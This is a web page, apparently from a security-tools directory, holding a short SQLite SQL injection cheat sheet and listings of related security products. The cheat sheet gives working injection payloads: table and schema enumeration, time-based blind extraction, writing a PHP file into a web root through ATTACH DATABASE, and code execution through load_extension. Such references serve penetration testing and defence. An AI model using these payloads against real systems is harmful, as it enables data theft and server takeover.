SQLite SQL Injection Cheat Sheet
If you need You use Concatenation || Comments -- Conditionals CASE WHEN key='value1' THEN 'something' WHEN key='value2' THEN 'somethingelse' Substring substr(string,start,stop) Length length(string) Quotes without literal quotes cast(X'27' as text) --use X'22' for double quotes Table name enumeration SELECT name FROM sqlite_master WHERE type='table' Table schema enumeration SELECT sql FROM sqlite_master WHERE type='table' Time-based data extraction cond='true' AND 1=randomblob(100000000) --causes time delay if cond='true' File writing 1';ATTACH DATABASE ‘/var/www/lol.php’ AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (‘’;-- --requires either direct database access or (non-default) stacked query option enabled Arbitrary Code Execution load_extension(library_file,entry_point) -- .dll for Windows, .so for 'nix. Requires non-default configuration
FEATURES
EXPLORE BY TAGS
SIMILAR TOOLS
A comprehensive guide to investigating security incidents in popular cloud platforms, covering essential tools, logs, and techniques for cloud investigation and incident response.
A comprehensive guide to understanding and responding to modern ransomware attacks, covering incident response, cyber threat intelligence, and forensic analysis.
A practical guide to enhancing digital investigations with cutting-edge memory forensics techniques, covering fundamental concepts, tools, and techniques for memory forensics.
A comprehensive guide to developing an incident response capability through intelligence-based threat hunting, covering theoretical concepts and real-life scenarios.
A comprehensive SQL injection cheat sheet covering various database management systems and techniques.
A comprehensive guide to digital forensics and incident response, covering incident response frameworks, digital forensic techniques, and threat intelligence.
A comprehensive guide to incident response, providing effective techniques for responding to advanced attacks against local and remote network resources.
Comprehensive security training platform for web developers, offering hands-on experience with real, vulnerable applications and concrete advice for securing code.
A comprehensive guide to network security monitoring, teaching readers how to detect and respond to intrusions using open source software and vendor-neutral tools.
PINNED
Proton Pass is a cross-platform password manager that provides encrypted storage, password generation, and security monitoring features with integrated 2FA and dark web monitoring capabilities.
NordVPN is a commercial VPN service that encrypts internet connections and hides IP addresses through a global network of servers, featuring integrated threat protection and multi-device support.
Fractional CISO service that helps B2B companies implement security leadership to win enterprise deals, achieve compliance, and develop strategic security programs.
Checkmarx SCA
A software composition analysis tool that identifies vulnerabilities, malicious code, and license risks in open source dependencies throughout the software development lifecycle.
Orca Security
A cloud-native application protection platform that provides agentless security monitoring, vulnerability management, and compliance capabilities across multi-cloud environments.
DryRun
A GitHub application that performs automated security code reviews by analyzing contextual security aspects of code changes during pull requests.